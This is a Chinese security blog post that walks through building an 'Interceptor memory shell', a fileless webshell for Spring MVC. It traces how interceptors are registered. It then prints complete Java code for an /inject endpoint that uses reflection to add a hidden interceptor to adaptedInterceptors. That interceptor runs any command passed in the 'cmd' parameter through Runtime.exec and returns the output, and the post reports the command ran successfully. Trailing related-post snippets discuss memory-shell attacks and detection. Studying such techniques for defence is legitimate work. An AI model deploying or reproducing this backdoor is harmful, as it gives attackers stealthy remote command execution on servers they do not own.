[Java安全]—Interceptor内存马

已于 2023-05-22 13:38:28 修改
阅读量442 收藏 1
点赞数
分类专栏: Java 文章标签: java 安全 servlet
于 2022-11-03 12:28:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/127655807
版权

文章首发于先知社区:浅析Spring类内存马

环境搭建

依赖

<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-webmvc</artifactId>
    <version>5.3.22</version>
</dependency>

<dependency>
    <groupId>javax.servlet</groupId>
    <artifactId>servlet-api</artifactId>
    <version>2.5</version>
</dependency>

web.xml

<servlet>
    <servlet-name>SpringMVC</servlet-name>
    <servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
    <init-param>
        <param-name>contextConfigLocation</param-name>
        <param-value>classpath:SpringMVC.xml</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
    <servlet-name>SpringMVC</servlet-name>
    <url-pattern>/</url-pattern>
</servlet-mapping>

SpringMVC.xml

<context:component-scan base-package="com.sentiment"/>
<!--配置视图解析器-->
<bean class="org.springframework.web.servlet.view.InternalResourceViewResolver">
    <!--配置前缀-->
    <property name="prefix" value="/"></property>
    <!--配置后缀-->
    <property name="suffix" value=".jsp"></property>
</bean>
<mvc:annotation-driven />
<mvc:interceptors>
    <mvc:interceptor>
        <mvc:mapping path="/demo"/>
        <ref bean="InterceptorTest"/>
    </mvc:interceptor>
</mvc:interceptors>

<mvc:interceptors>设置需要拦截的请求,这里拦截的是/demo请求,拦截器时自己定义的InterceptorTest

前置知识

Interceptor

Interceptor拦截器相当于一个过滤,就是在发送某个请求前对其进行一定的拦截过滤。拦截器用于拦截控制器方法的执行,需要实现HandlerInterceptor,并且必须在SpingMVC的配置文件中进行配置

拦截过程

1、程序先执行preHandle()方法,如果该方法的返回值为true,则程序会继续向下执行处理器中的方法,否则将不再向下执行;

2、控制器Controller类处理完请求后,会执行postHandle()方法,然后会通过DispatcherServlet向客户端返回响应;

3、在DispatcherServlet处理完请求后,才会执行afterCompletion()方法。

Demo

控制器

@RestController
public class HelloController {
    @RequestMapping("/demo")
    public String hello(Model model){
        model.addAttribute("name","Hello,Sentiemnt!");
        return "Hello,Sentiment!";
    }
}

拦截器

@Component("InterceptorTest")
public class InterceptorTest implements HandlerInterceptor {
    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
        System.out.println("preHandle执行了....");
        return true;
    }

    @Override
    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
        System.out.println("postHandle执行了...");
    }

    @Override
    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
        System.out.println("afterCompletion执行了....");
    }
}

当发起/demo请求时,则会执行自定义的拦截器,如果preHandle返回值为true则会继续向下执行另外两个
在这里插入图片描述

调试后发现在doDispatch#applyPreHandle调用了preHandle,所以如果我们需要注册拦截的话一定是在这之前
在这里插入图片描述

注册流程

首先是调用的是processedRequest = checkMultipart(request);,主要判断request是否为文件上传请求,不是的话则会原样返回

接着就是mappedHandler = this.getHandler(processedRequest);将getHandler()执行后的结果返回给mappedHandler
在这里插入图片描述

跟进getHandler,获取HandlerMapping,并继续调用getHandler()

protected HandlerExecutionChain getHandler(HttpServletRequest request) throws Exception {
    if (this.handlerMappings != null) {
        Iterator var2 = this.handlerMappings.iterator();

        while(var2.hasNext()) {
            HandlerMapping mapping = (HandlerMapping)var2.next();
            HandlerExecutionChain handler = mapping.getHandler(request);
            if (handler != null) {
                return handler;
            }
        }
    }

继续跟进,在下边会调用getHandlerExecutionChain(),其中会遍历 this.adaptedInterceptors 对象里所有的 HandlerInterceptor 类实例,通过 chain.addInterceptor 把已有的所有拦截器加入到需要返回的 HandlerExecutionChain exectuion 属性中,完成注册
在这里插入图片描述

之后就是通过一级级的retrun 将值返回给**mappedHandler**,并通过上边提到的mappedHandler.applyPreHandle()调用PreHandle()

注册

通过上边的分析,下面就需要我们把注入内容添加到adaptedInterceptors中,而获取前需要先获取上下文,adaptedInterceptors属性是AbstractHandlerMapping类的,而该类可以通过controller内存马中提到的RequestMappingHandlerMappingDefaultAnnotationHandlerMapping获取,所以在SpringMVC.xml中加上<mvc:annotation-driven />即可
在这里插入图片描述

// 1. 获取上下文环境
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.THEME_SOURCE", 0);

// 2. 通过上下文获取RequestMappingHandlerMapping
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);

AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping)context.getBean("");

之后通过反射获取adaptedInterceptors属性

// 3、反射获取adaptedInterceptors属性
Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
field.setAccessible(true);
ArrayList<HandlerInterceptor> adaptedInterceptors = (ArrayList<HandlerInterceptor>)field.get(mappingHandlerMapping);

最后将我们自定义的内存马,添加到属性中

//4、生成MappedInterceptor对象
MappedInterceptor mappedInterceptor = new MappedInterceptor(null,null,new InjectInterceptor());

// 5、添加到adaptedInterceptors中
adaptedInterceptors.add(mappedInterceptor);

内存马构造

package com.sentiment.controller;

import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.ModelAndView;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import org.springframework.web.servlet.handler.MappedInterceptor;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.reflect.Field;
import java.util.ArrayList;

@RestController
public class InterceptorShell{
    @RequestMapping(value = "/inject", method = RequestMethod.GET)
    public String inject() throws NoSuchMethodException, NoSuchFieldException, IllegalAccessException {
        try{
            // 1. 获取上下文环境
            WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

            // 2. 通过上下文获取RequestMappingHandlerMapping
            RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);

            // 3、反射获取adaptedInterceptors属性
            Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
            field.setAccessible(true);
            ArrayList<HandlerInterceptor> adaptedInterceptors = (ArrayList<HandlerInterceptor>)field.get(mappingHandlerMapping);

            //4、生成MappedInterceptor对象
            MappedInterceptor mappedInterceptor = new MappedInterceptor(null,null,new InjectInterceptor());

            // 5、添加到adaptedInterceptors中
            adaptedInterceptors.add(mappedInterceptor);

            return "Inject Success!";
        } catch (Exception e) {
            return "Inject Failed!";
        }
    }
}

class InjectInterceptor implements HandlerInterceptor {

    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
        InputStream is = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        InputStreamReader isr = new InputStreamReader(is, "UTF-8");
        BufferedReader br = new BufferedReader(isr);
        String str = "";
        String line = "";

        while ((line = br.readLine())!=null){
            str+=line;
        }
        is.close();
        br.close();
        response.getWriter().write(str);
        return false;
    }
    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
    }

    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
    }
}

访问inject后生成内存马,成功执行命令
在这里插入图片描述

参考链接

LandGrey’s Blog

初探DispatcherServlet#doDispatch - Zh1z3ven - 博客园 (cnblogs.com)

java内存马分析集合 - 先知社区 (aliyun.com)

初探Java安全之Spring内存马 - 先知社区 (aliyun.com)

S1nJa
关注
专栏目录
再谈Spring内存Interceptor(内存系列篇十)
阿道夫的博客
03-10 276
在系统中,经常需要在处理用户请求之前和之后执行一些行为,例如检测用户的权限,或者将请求的信息记录到日志中,即平时所说的“权限检测”及“日志记录”。当然不仅仅这些,所以需要一种机制,拦截用户的请求,在请求的前后添加处理逻辑。Spring MVC 提供了 Interceptor 拦截器机制,用于请求的预处理和后处理。在实际应用中常见的作用为:日志记录:记录请求信息的日志,以便进行信息监控、信息统计、计算 PV(Page View)等;权限检查:如登录检测,进入处理器检测是否登录;
Java内存攻防实战——攻击基础篇
JavaMonsterr的博客
05-23 3277
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也发展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀。而内存技术则是通过在运行的服务中直接插入运行攻击者的webshell逻辑,利用中间件的进程执行某些恶意代码,而不依赖实体文件的存在实现的服务后门,因此具有更好的隐蔽性,也更容易躲避传统安全监测设备的检测。 本文以Java语言为基础讨论内存技术的攻防,分为两个篇章,分别是攻击基础篇和防护应用篇。本篇攻击基础篇介绍了Java Servlet
针对Spring MVC的Interceptor内存
weixin_45032957的博客
06-10 233
1.2 探索拦截器的调用链 断点打在TestInterceptor类中,调试看看调用链 preHandle:31, TestInterceptor (bitterz.interceptors) applyPreHandle:134, HandlerExecutionChain (org.springframework.web.servlet) doDispatch:956, DispatcherServlet (org.springframework.web.servlet) doService:895,
Java内存使用
最新发布
mudi13的博客
09-05 1092
对于终端安全:有文件监控、防篡改、EDR;对于后门:有 Webshell 查杀、流量监测;对于网络层面:有防火墙防止反连、反向代理系统隐藏真实 IP;等等。​ 目前主流的防御措施针对 Webshell 的静态检出率在 90% 以上,在部分环境下甚至完全无法落地,防御方可以做到快速应急响应。正因为这些限制,内存技术得以诞生并快速发展,无文件攻击、内存 Webshell、进程注入等基于内存的攻击手段也受到了越来越多的师傅青睐,在实战环境中已占得一席之地。
Interceptor内存
why811的博客
09-26 166
Interceptor是SpringMVC中的拦截器,类似于Servlet中的Filter,主要针对Controller层进行拦截请求。
JAVA 内存
qq_43148822的博客
05-24 62
缺点:针对恶意代码的分析,如果恶意代码不是存在于该可疑的类中,而是通过多层的调用链调用的,分析的难度将大大增加,针对单个class的分析将无法有效的检测出。至此,已经成功将Java进程中的Servlet类修改,所有的请求都会经过内存的代码,攻击者构造特定格式的POST请求就会进入内存的代码逻辑中,执行恶意请求。我们可以同样利用Java 的Instrument机制,动态注入我们的检测Agent,获取JVM中所有加载的Class的数据,针对内存可疑的特征,让隐藏的内存现出原型。
Java内存-Instrument
mole_exp的博客
04-20 948
文章目录Java Instrument简介Java Agent 开发agentmain() 方法VirtualMachineAgent内存实现:Tomcat环境演示:Tomcat环境演示:Springboot环境Instrument内存的特点参考 Java Instrument简介 我们只要拥有一个web容器进程执行用户的权限,理论上就可以完全控制该进程的地址空间(更确切的说是地址空间中的非Kernel部分),包括地址空间内的数据和代码。OS层进程注入的方法有很多,不过具体到Java环境,我们不需要使用
java内存分析集合
hongduilanjun的博客
04-04 5364
基于tomcat Servlet内存 web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
内存分析总结
qq_38618396的博客
04-13 1648
文章目录TomcatTomcat环境搭建Servlet-API型Listener内存Filter内存Servlet内存Valve内存字节码增强型SpingSpring环境搭建拦截器Controller型 Tomcat Tomcat环境搭建 Servlet-API型 Listener内存 Filter内存 Servlet内存 Valve内存 字节码增强型 Sping Spring环境搭建 拦截器 Controller型 ......
内存介绍及分析-带查杀工具tomcat memshell scanner.jsp
weixin_65629944的博客
12-18 1036
先判断是通过什么方法注入的内存,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存注入流量特征与普通webshell的流量特征基本吻合。4.java VisualVM工具:是一款免费的,集成了多个 JDK 命令行工具的可视化工具,它能为您提供强大的分析能力,对 Java 应用程序做性能分析和调优。cmd=后跟命令即可。
Java内存-Tomcat篇
mole_exp的博客
04-20 1203
Java安全_内存-Tomcat篇
Java内存简单实现
派大星的博客
12-04 2447
Java内存
[Java安全]—Controller内存
Sentiment的博客
11-02 612
Controller内存
Java内存基础
m0_46317063的博客
02-05 386
filter内存基础
安全记录】基于Tomcat的Java内存初探
君行路的博客
08-22 456
文章目录1. 前言2. 基础知识2.1 servlet 和 filter2.2 servlet 和 filter 的生命周期2.3 Tomcat 的 Container – 容器组件2.4 Tomcat中的启动加载顺序3. 内存技术实现介绍3.1 获取上下文对象 ServletContext3.1.1 通过当前 request 对象获取 ServletContext3.1.2 通过 `Thread.currentThread().getContextClassLoader()` 获取 StandardCo
java怎么编写内存
weixin_36845733的博客
07-14 60
如何使用Java编写内存 内存(Memory Shellcode)是一种利用内存中的恶意代码来执行攻击的技术。在本文中,我们将介绍如何使用Java编写内存,并通过代码示例展示实现过程。 1. 理解内存的原理 内存的原理是将恶意代码注入到目标进程的内存空间中,然后利用目标进程执行该恶意代码。这样可以绕过传统的安全防...
Java内存学习-Filter
cjdgg的博客
05-03 919
Java内存学习-FliterTomcat架构学习 Tomcat架构学习 Server: Server,即指的WEB服务器,一个Server包括多个Service。 Service: Service的作用是在Connector和Engine外面包了一层(可看上图),把它们组装在一起,对外提供服务。一个Service可以包含多个Connector,但是只能包含一个Engine,其中Connector的作用是从客户端接收请求,Engine的作用是处理接收进来的请求。后面再来细节分析Service。 Conne
Java内存 原理、实战与查杀】
weixin_46318447的博客
06-11 1860
内存原理 、实战与查杀
javainterceptor层的作用
04-20
Java中的interceptor层主要用于拦截应用程序的请求,进行一些预处理或后处理操作。这个层的作用是增强代码的可重用性、可维护性和可扩展性。具体来说,interceptor可以用于实现用户身份认证、缓存处理、日志记录、性能监控等功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值